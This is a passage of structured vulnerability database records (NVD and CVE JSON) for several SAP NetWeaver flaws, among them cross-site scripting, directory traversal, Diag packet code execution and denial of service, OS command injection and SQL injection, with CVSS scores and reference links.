"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "cna@sap.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-06-13T03:15:09.667",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/3331627"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/3331627"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "cna@sap.com",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2016-02-16 15:59
Modified
2024-11-21 02:48
Severity ?
Summary
Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978."
},
{
"lang": "es",
"value": "Vulnerabilidad de salto de directorio en la funci\u00f3n GetFileList en el componente SAP Manufacturing Integration and Inteligence (xMII) 15.0 para SAP NetWeaver 7.4 permite a atacantes romotos leer archivos arbitrarios a trav\u00e9s de .. (punto punto) en el parametro Path para /Catalog, tambi\u00e9n conocido como SAP Security Note 2230978."
}
],
"id": "CVE-2016-2389",
"lastModified": "2024-11-21T02:48:22.307",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2016-02-16T15:59:03.023",
"references": [
{
"source": "cve@mitre.org",
"url": "http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html"
},
{
"source": "cve@mitre.org",
"url": "http://seclists.org/fulldisclosure/2016/May/40"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/press-center/blog/sap-security-notes-february-2016-review/"
},
{
"source": "cve@mitre.org",
"url": "https://www.exploit-db.com/exploits/39837/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/fulldisclosure/2016/May/40"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/press-center/blog/sap-security-notes-february-2016-review/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://www.exploit-db.com/exploits/39837/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2012-05-15 04:21
Modified
2024-11-21 01:39
Severity ?
Summary
The DiagTraceR3Info function in the Dialog processor in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2, when a certain Developer Trace configuration is enabled, allows remote attackers to execute arbitrary code via a crafted SAP Diag packet.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"matchCriteriaId": "9FC1767F-10BD-468B-8D2B-538C82EB69B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"matchCriteriaId": "D04DC424-129B-448D-994B-7AC5D9B64703",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The DiagTraceR3Info function in the Dialog processor in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2, when a certain Developer Trace configuration is enabled, allows remote attackers to execute arbitrary code via a crafted SAP Diag packet."
},
{
"lang": "es",
"value": "La funci\u00f3n DiagTraceR3Info en el procesador Dialog en disp+work.exe v7010.29.15.58313 y v7200.70.18.23869 en el Dispatcher en SAP NetWeaver v7.0 EHP1 y EHP2, cuando est\u00e1 activada una configuraci\u00f3n concreta de Developer Trace, permite a atacantes remotos ejecutar c\u00f3digo a trav\u00e9s de un paquete SAP Diag manipulado."
}
],
"id": "CVE-2012-2611",
"lastModified": "2024-11-21T01:39:18.183",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2012-05-15T04:21:43.547",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id?1027052"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id?1027052"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1687910"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2012-05-15 04:21
Modified
2024-11-21 01:39
Severity ?
Summary
The DiagTraceAtoms function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"matchCriteriaId": "9FC1767F-10BD-468B-8D2B-538C82EB69B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"matchCriteriaId": "D04DC424-129B-448D-994B-7AC5D9B64703",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The DiagTraceAtoms function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet."
},
{
"lang": "es",
"value": "La funci\u00f3n de DiagTraceAtoms en disp+work.exe v7010.29.15.58313 y v7200.70.18.23869 en el distribuidor de la plataforma SAP NetWeaver v7.0 EHP1 y EHP2 permite a atacantes remotos causar una denegaci\u00f3n de servicio (ca\u00edda de demonio) a trav\u00e9s de un paquete dise\u00f1ado SAP Diag."
}
],
"id": "CVE-2012-2511",
"lastModified": "2024-11-21T01:39:09.683",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2012-05-15T04:21:43.330",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id?1027052"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75453"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id?1027052"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75453"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1687910"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
cve-2016-7435
Vulnerability from cvelistv5
Published
2016-10-05 16:00
Modified
2024-08-06 01:57
Severity ?
EPSS score ?
Summary
The (1) SCTC_REFRESH_EXPORT_TAB_COMP, (2) SCTC_REFRESH_CHECK_ENV, and (3) SCTC_TMS_MAINTAIN_ALOG functions in the SCTC subpackage in SAP Netweaver 7.40 SP 12 allow remote authenticated users with certain permissions to execute arbitrary commands via vectors involving a CALL 'SYSTEM' statement, aka SAP Security Note 2260344.
References
| ▼ | URL | Tags |
|---|---|---|
| http://seclists.org/fulldisclosure/2016/Oct/1 | mailing-list, x_refsource_FULLDISC | |
| http://seclists.org/fulldisclosure/2016/Oct/0 | mailing-list, x_refsource_FULLDISC | |
| https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshcheckenv | x_refsource_MISC | |
| https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshexporttabcomp | x_refsource_MISC | |
| https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctctmsmaintainalog | x_refsource_MISC | |
| http://www.securityfocus.com/bid/93272 | vdb-entry, x_refsource_BID | |
| http://seclists.org/fulldisclosure/2016/Oct/2 | mailing-list, x_refsource_FULLDISC | |
| https://www.onapsis.com/blog/analyzing-sap-security-notes-march-2016 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T01:57:47.627Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20161003 Onapsis Security Advisory ONAPSIS-2016-043: SAP OS Command Injection in SCTC_TMS_MAINTAIN_ALOG",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/1"
},
{
"name": "20161003 Onapsis Security Advisory ONAPSIS-2016-041: SAP OS Command Injection in SCTC_REFRESH_EXPORT_TAB_COMP",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/0"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshcheckenv"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshexporttabcomp"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctctmsmaintainalog"
},
{
"name": "93272",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/93272"
},
{
"name": "20161003 Onapsis Security Advisory ONAPSIS-2016-042: SAP OS Command Injection in SCTC_REFRESH_CHECK_ENV",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/2"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.onapsis.com/blog/analyzing-sap-security-notes-march-2016"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-09-22T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The (1) SCTC_REFRESH_EXPORT_TAB_COMP, (2) SCTC_REFRESH_CHECK_ENV, and (3) SCTC_TMS_MAINTAIN_ALOG functions in the SCTC subpackage in SAP Netweaver 7.40 SP 12 allow remote authenticated users with certain permissions to execute arbitrary commands via vectors involving a CALL \u0027SYSTEM\u0027 statement, aka SAP Security Note 2260344."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-11-25T19:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20161003 Onapsis Security Advisory ONAPSIS-2016-043: SAP OS Command Injection in SCTC_TMS_MAINTAIN_ALOG",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/1"
},
{
"name": "20161003 Onapsis Security Advisory ONAPSIS-2016-041: SAP OS Command Injection in SCTC_REFRESH_EXPORT_TAB_COMP",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/0"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshcheckenv"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshexporttabcomp"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctctmsmaintainalog"
},
{
"name": "93272",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/93272"
},
{
"name": "20161003 Onapsis Security Advisory ONAPSIS-2016-042: SAP OS Command Injection in SCTC_REFRESH_CHECK_ENV",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/2"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.onapsis.com/blog/analyzing-sap-security-notes-march-2016"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-7435",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The (1) SCTC_REFRESH_EXPORT_TAB_COMP, (2) SCTC_REFRESH_CHECK_ENV, and (3) SCTC_TMS_MAINTAIN_ALOG functions in the SCTC subpackage in SAP Netweaver 7.40 SP 12 allow remote authenticated users with certain permissions to execute arbitrary commands via vectors involving a CALL \u0027SYSTEM\u0027 statement, aka SAP Security Note 2260344."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20161003 Onapsis Security Advisory ONAPSIS-2016-043: SAP OS Command Injection in SCTC_TMS_MAINTAIN_ALOG",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Oct/1"
},
{
"name": "20161003 Onapsis Security Advisory ONAPSIS-2016-041: SAP OS Command Injection in SCTC_REFRESH_EXPORT_TAB_COMP",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Oct/0"
},
{
"name": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshcheckenv",
"refsource": "MISC",
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshcheckenv"
},
{
"name": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshexporttabcomp",
"refsource": "MISC",
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshexporttabcomp"
},
{
"name": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctctmsmaintainalog",
"refsource": "MISC",
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctctmsmaintainalog"
},
{
"name": "93272",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/93272"
},
{
"name": "20161003 Onapsis Security Advisory ONAPSIS-2016-042: SAP OS Command Injection in SCTC_REFRESH_CHECK_ENV",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Oct/2"
},
{
"name": "https://www.onapsis.com/blog/analyzing-sap-security-notes-march-2016",
"refsource": "MISC",
"url": "https://www.onapsis.com/blog/analyzing-sap-security-notes-march-2016"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-7435",
"datePublished": "2016-10-05T16:00:00",
"dateReserved": "2016-09-09T00:00:00",
"dateUpdated": "2024-08-06T01:57:47.627Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-6869
Vulnerability from cvelistv5
Published
2013-11-23 19:00
Modified
2024-08-06 17:53
Severity ?
EPSS score ?
Summary
SQL injection vulnerability in the SRTT_GET_COUNT_BEFORE_KEY_RFC function in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securitytracker.com/id/1029352 | vdb-entry, x_refsource_SECTRACK | |
| https://service.sap.com/sap/support/notes/1783795 | x_refsource_CONFIRM | |
| https://erpscan.io/advisories/erpscan-13-017-sap-netweaver-srtt_get_count_before_key_rfc-sql-injection/ | x_refsource_MISC | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| http://secunia.com/advisories/55736 | third-party-advisory, x_refsource_SECUNIA |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:53:44.686Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "1029352",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1029352"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1783795"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-13-017-sap-netweaver-srtt_get_count_before_key_rfc-sql-injection/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "55736",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/55736"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-11-01T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "SQL injection vulnerability in the SRTT_GET_COUNT_BEFORE_KEY_RFC function in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "1029352",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1029352"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/1783795"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-13-017-sap-netweaver-srtt_get_count_before_key_rfc-sql-injection/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "55736",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/55736"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-6869",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SQL injection vulnerability in the SRTT_GET_COUNT_BEFORE_KEY_RFC function in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "1029352",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1029352"
},
{
"name": "https://service.sap.com/sap/support/notes/1783795",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/1783795"
},
{
"name": "https://erpscan.io/advisories/erpscan-13-017-sap-netweaver-srtt_get_count_before_key_rfc-sql-injection/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-13-017-sap-netweaver-srtt_get_count_before_key_rfc-sql-injection/"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "55736",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/55736"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-6869",
"datePublished": "2013-11-23T19:00:00",
"dateReserved": "2013-11-23T00:00:00",
"dateUpdated": "2024-08-06T17:53:44.686Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2012-2513
Vulnerability from cvelistv5
Published
2012-05-15 01:00
Modified
2024-08-06 19:34
Severity ?
EPSS score ?
Summary
The Diaginput function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.
References
| ▼ | URL | Tags |
|---|---|---|
| https://exchange.xforce.ibmcloud.com/vulnerabilities/75455 | vdb-entry, x_refsource_XF | |
| https://service.sap.com/sap/support/notes/1687910 | x_refsource_MISC | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities | x_refsource_MISC | |
| http://www.securitytracker.com/id?1027052 | vdb-entry, x_refsource_SECTRACK |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T19:34:25.797Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "netweaver-diaginput-dos(75455)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75455"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"name": "1027052",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1027052"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2012-05-08T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The Diaginput function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "netweaver-diaginput-dos(75455)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75455"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"name": "1027052",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1027052"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
